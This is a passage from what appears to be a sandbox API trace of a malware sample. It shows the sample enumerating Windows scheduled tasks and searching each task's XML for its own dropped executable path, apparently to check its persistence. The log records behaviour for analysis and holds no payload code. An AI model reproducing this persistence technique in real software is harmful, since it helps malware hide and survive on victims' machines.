false\r\n false\r\n \r\n StopExisting\r\n true\r\n true\r\n false\r\n true\r\n false\r\n true\r\n true\r\n true\r\n true\r\n false\r\n 7\r\n true\r\n \r\n \r\n \r\n {c1f85ef8-bcc2-4606-bb39-70c523715eb3}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0227.905] IUnknown:Release (This=0x297030) returned 0x0 [0227.905] IUnknown:Release (This=0x296ee0) returned 0x0 [0227.905] ITaskFolder:GetFolders (in: This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296ee0) returned 0x0 [0227.906] ITaskFolderCollection:get_Count (in: This=0x296ee0, pCount=0x12e008 | out: pCount=0x12e008*=0) returned 0x0 [0227.906] IUnknown:Release (This=0x296ee0) returned 0x0 [0227.906] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0227.906] ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0227.906] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296ee0) returned 0x0 [0227.908] IRegisteredTaskCollection:get_Count (in: This=0x296ee0, pCount=0x12dff0 | out: pCount=0x12dff0*=2) returned 0x0 [0227.908] IRegisteredTaskCollection:get_Item (in: This=0x296ee0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297040) returned 0x0 [0227.908] IRegisteredTask:get_Name (in: This=0x297040, pName=0x12dea0 | out: pName=0x12dea0*="Microsoft-Windows-DiskDiagnosticDataCollector") returned 0x0 [0227.908] IRegisteredTask:get_Xml (in: This=0x297040, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-101)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-100)\r\n Microsoft\\Windows\\DiskDiagnostic\\Microsoft-Windows-DiskDiagnosticDataCollector\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)\r\n 1.0\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-119)\r\n \r\n \r\n true\r\n false\r\n true\r\n IgnoreNew\r\n true\r\n false\r\n true\r\n false\r\n \r\n false\r\n \r\n true\r\n true\r\n \r\n \r\n \r\n 2004-01-01T01:00:00\r\n \r\n \r\n \r\n \r\n 2\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n dfdts.dll,DfdGetDefaultPolicyAndSMART\r\n \r\n \r\n") returned 0x0 [0227.910] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-101)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-100)\r\n Microsoft\\Windows\\DiskDiagnostic\\Microsoft-Windows-DiskDiagnosticDataCollector\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)\r\n 1.0\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-119)\r\n \r\n \r\n true\r\n false\r\n true\r\n IgnoreNew\r\n true\r\n false\r\n true\r\n false\r\n \r\n false\r\n \r\n true\r\n true\r\n \r\n \r\n \r\n 2004-01-01T01:00:00\r\n \r\n \r\n \r\n \r\n 2\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n dfdts.dll,DfdGetDefaultPolicyAndSMART\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0227.938] IUnknown:Release (This=0x297040) returned 0x0 [0227.939] IRegisteredTaskCollection:get_Item (in: This=0x296ee0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297040) returned 0x0 [0227.939] IRegisteredTask:get_Name (in: This=0x297040, pName=0x12dea0 | out: pName=0x12dea0*="Microsoft-Windows-DiskDiagnosticResolver") returned 0x0 [0227.939] IRegisteredTask:get_Xml (in: This=0x297040, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-101)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-100)\r\n Microsoft\\Windows\\DiskDiagnostic\\Microsoft-Windows-DiskDiagnosticResolver\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)(A;;FR;;;BU)\r\n 1.0\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-118)\r\n \r\n \r\n true\r\n false\r\n Parallel\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\DFDWiz.exe\r\n \r\n \r\n") returned 0x0 [0227.941] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-101)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-100)\r\n Microsoft\\Windows\\DiskDiagnostic\\Microsoft-Windows-DiskDiagnosticResolver\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)(A;;FR;;;BU)\r\n 1.0\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-118)\r\n \r\n \r\n true\r\n false\r\n Parallel\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\DFDWiz.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0227.959] IUnknown:Release (This=0x297040) returned 0x0 [0227.959] IUnknown:Release (This=0x296ee0) returned 0x0 [0227.960] ITaskFolder:GetFolders (in: This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296ee0) returned 0x0 [0227.961] ITaskFolderCollection:get_Count (in: This=0x296ee0, pCount=0x12e008 | out: pCount=0x12e008*=0) returned 0x0 [0227.961] IUnknown:Release (This=0x296ee0) returned 0x0 [0227.961] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0227.961] ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xb, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0227.961] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296ed0) returned 0x0 [0227.962] IRegisteredTaskCollection:get_Count (in: This=0x296ed0, pCount=0x12dff0 | out: pCount=0x12dff0*=1) returned 0x0 [0227.962] IRegisteredTaskCollection:get_Item (in: This=0x296ed0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297020) returned 0x0 [0227.962] IRegisteredTask:get_Name (in: This=0x297020, pName=0x12dea0 | out: pName=0x12dea0*="Notifications") returned 0x0 [0227.962] IRegisteredTask:get_Xml (in: This=0x297020, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n $(@%systemRoot%\\system32\\LocationNotifications.exe,-102)\r\n Microsoft\\Windows\\Location\\Notifications\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)\r\n 1.3\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"Application\"><Select Path=\"Application\">*[System[Provider[@Name='LocationNotifications'] and EventID=1]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n true\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n %windir%\\System32\\LocationNotifications.exe\r\n \r\n \r\n") returned 0x0 [0227.964] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemRoot%\\system32\\LocationNotifications.exe,-102)\r\n Microsoft\\Windows\\Location\\Notifications\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)\r\n 1.3\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"Application\"><Select Path=\"Application\">*[System[Provider[@Name='LocationNotifications'] and EventID=1]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n true\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n %windir%\\System32\\LocationNotifications.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0227.992] IUnknown:Release (This=0x297020) returned 0x0 [0227.992] IUnknown:Release (This=0x296ed0) returned 0x0 [0227.992] ITaskFolder:GetFolders (in: This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296ed0) returned 0x0 [0227.993] ITaskFolderCollection:get_Count (in: This=0x296ed0, pCount=0x12e008 | out: pCount=0x12e008*=0) returned 0x0 [0227.993] IUnknown:Release (This=0x296ed0) returned 0x0 [0227.993] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0227.993] ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0227.993] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296ee0) returned 0x0 [0227.994] IRegisteredTaskCollection:get_Count (in: This=0x296ee0, pCount=0x12dff0 | out: pCount=0x12dff0*=1) returned 0x0 [0227.994] IRegisteredTaskCollection:get_Item (in: This=0x296ee0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297030) returned 0x0 [0227.994] IRegisteredTask:get_Name (in: This=0x297030, pName=0x12dea0 | out: pName=0x12dea0*="WinSAT") returned 0x0 [0227.994] IRegisteredTask:get_Xml (in: This=0x297030, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n $(@%systemroot%\\system32\\winsatapi.dll,-113)\r\n 2008-02-25T19:15:00\r\n $(@%systemroot%\\system32\\winsatapi.dll,-112)\r\n $(@%systemroot%\\system32\\winsatapi.dll,-114)\r\n Microsoft\\Windows\\Maintenance\\WinSAT\r\n \r\n \r\n \r\n 2008-01-01T01:00:00\r\n true\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-32-544\r\n HighestAvailable\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n false\r\n false\r\n true\r\n false\r\n true\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n {A9A33436-678B-4C9C-A211-7CC38785E79D}\r\n \r\n \r\n") returned 0x0 [0227.996] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\winsatapi.dll,-113)\r\n 2008-02-25T19:15:00\r\n $(@%systemroot%\\system32\\winsatapi.dll,-112)\r\n $(@%systemroot%\\system32\\winsatapi.dll,-114)\r\n Microsoft\\Windows\\Maintenance\\WinSAT\r\n \r\n \r\n \r\n 2008-01-01T01:00:00\r\n true\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-32-544\r\n HighestAvailable\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n false\r\n false\r\n true\r\n false\r\n true\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n {A9A33436-678B-4C9C-A211-7CC38785E79D}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0228.027] IUnknown:Release (This=0x297030) returned 0x0 [0228.027] IUnknown:Release (This=0x296ee0) returned 0x0 [0228.027] ITaskFolder:GetFolders (in: This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296ee0) returned 0x0 [0228.028] ITaskFolderCollection:get_Count (in: This=0x296ee0, pCount=0x12e008 | out: pCount=0x12e008*=0) returned 0x0 [0228.028] IUnknown:Release (This=0x296ee0) returned 0x0 [0228.028] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0228.028] ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xd, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0228.028] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296ee0) returned 0x0 [0228.041] IRegisteredTaskCollection:get_Count (in: This=0x296ee0, pCount=0x12dff0 | out: pCount=0x12dff0*=21) returned 0x0 [0228.041] IRegisteredTaskCollection:get_Item (in: This=0x296ee0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297030) returned 0x0 [0228.041] IRegisteredTask:get_Name (in: This=0x297030, pName=0x12dea0 | out: pName=0x12dea0*="ActivateWindowsSearch") returned 0x0 [0228.041] IRegisteredTask:get_Xml (in: This=0x297030, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ActivateWindowsSearch\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-26)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoActivateWindowsSearch\r\n \r\n \r\n") returned 0x0 [0228.043] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ActivateWindowsSearch\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-26)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoActivateWindowsSearch\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0228.062] IUnknown:Release (This=0x297030) returned 0x0 [0228.062] IRegisteredTaskCollection:get_Item (in: This=0x296ee0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297030) returned 0x0 [0228.062] IRegisteredTask:get_Name (in: This=0x297030, pName=0x12dea0 | out: pName=0x12dea0*="ConfigureInternetTimeService") returned 0x0 [0228.062] IRegisteredTask:get_Xml (in: This=0x297030, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ConfigureInternetTimeService\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-23)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoConfigureInternetTimeService\r\n \r\n \r\n") returned 0x0 [0228.064] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ConfigureInternetTimeService\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-23)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoConfigureInternetTimeService\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0228.083] IUnknown:Release (This=0x297030) returned 0x0 [0228.083] IRegisteredTaskCollection:get_Item (in: This=0x296ee0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297030) returned 0x0 [0228.083] IRegisteredTask:get_Name (in: This=0x297030, pName=0x12dea0 | out: pName=0x12dea0*="DispatchRecoveryTasks") returned 0x0 [0228.083] IRegisteredTask:get_Xml (in: This=0x297030, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\DispatchRecoveryTasks\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-27)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;AU)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n true\r\n Parallel\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoRecoveryTasks $(Arg0)\r\n \r\n \r\n") returned 0x0 [0228.085] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\DispatchRecoveryTasks\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-27)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;AU)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n true\r\n Parallel\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoRecoveryTasks $(Arg0)\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0228.104] IUnknown:Release (This=0x297030) returned 0x0 [0228.104] IRegisteredTaskCollection:get_Item (in: This=0x296ee0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297030) returned 0x0 [0228.105] IRegisteredTask:get_Name (in: This=0x297030, pName=0x12dea0 | out: pName=0x12dea0*="ehDRMInit") returned 0x0 [0228.105] IRegisteredTask:get_Xml (in: This=0x297030, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ehDRMInit\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-12)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWSDWDWO;;;LS)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-19\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DRMInit\r\n \r\n \r\n") returned 0x0 [0228.106] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ehDRMInit\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-12)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWSDWDWO;;;LS)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-19\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DRMInit\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0228.125] IUnknown:Release (This=0x297030) returned 0x0 [0228.125] IRegisteredTaskCollection:get_Item (in: This=0x296ee0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x5, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297030) returned 0x0 [0228.125] IRegisteredTask:get_Name (in: This=0x297030, pName=0x12dea0 | out: pName=0x12dea0*="InstallPlayReady") returned 0x0 [0228.125] IRegisteredTask:get_Xml (in: This=0x297030, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\InstallPlayReady\r\n 2008-02-08T15:02:27.7076832\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-25)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n Parallel\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /InstallPlayReady $(Arg0)\r\n \r\n \r\n") returned 0x0 [0228.127] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\InstallPlayReady\r\n 2008-02-08T15:02:27.7076832\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-25)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n Parallel\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /InstallPlayReady $(Arg0)\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0228.148] IUnknown:Release (This=0x297030) returned 0x0 [0228.148] IRegisteredTaskCollection:get_Item (in: This=0x296ee0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x6, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297030) returned 0x0 [0228.148] IRegisteredTask:get_Name (in: This=0x297030, pName=0x12dea0 | out: pName=0x12dea0*="mcupdate") returned 0x0 [0228.148] IRegisteredTask:get_Xml (in: This=0x297030, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\mcupdate\r\n 1982-01-15T16:30:00-08:00\r\n $(@%systemRoot%\\ehome\\ehres.dll,-125)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-126)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n Parallel\r\n false\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n 6\r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate\r\n $(Arg0)\r\n \r\n \r\n") returned 0x0 [0228.150] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\mcupdate\r\n 1982-01-15T16:30:00-08:00\r\n $(@%systemRoot%\\ehome\\ehres.dll,-125)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-126)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n \r\n S-1-5-20\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n Parallel\r\n false\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n 6\r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate\r\n $(Arg0)\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0228.172] IUnknown:Release (This=0x297030) returned 0x0 [0228.172] IRegisteredTaskCollection:get_Item (in: This=0x296ee0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297030) returned 0x0 [0228.172] IRegisteredTask:get_Name (in: This=0x297030, pName=0x12dea0 | out: pName=0x12dea0*="MediaCenterRecoveryTask") returned 0x0 [0228.172] IRegisteredTask:get_Xml (in: This=0x297030, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\MediaCenterRecoveryTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-137)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-138)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -MediaCenterRecoveryTask\r\n \r\n \r\n {23E5D772-327A-42f5-BDEE-C65C6796BB2A}\r\n \r\n \r\n \r\n") returned 0x0 [0228.174] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\MediaCenterRecoveryTask\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehres.dll,-137)\r\n $(@%systemRoot%\\ehome\\ehres.dll,-138)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)\r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\mcupdate.exe\r\n -MediaCenterRecoveryTask\r\n \r\n \r\n {23E5D772-327A-42f5-BDEE-C65C6796BB2A}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0228.197] IUnknown:Release (This=0x297030) returned 0x0 [0228.197] IRegisteredTaskCollection:get_Item (in: This=0x296ee0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x8, varVal2=0x0), 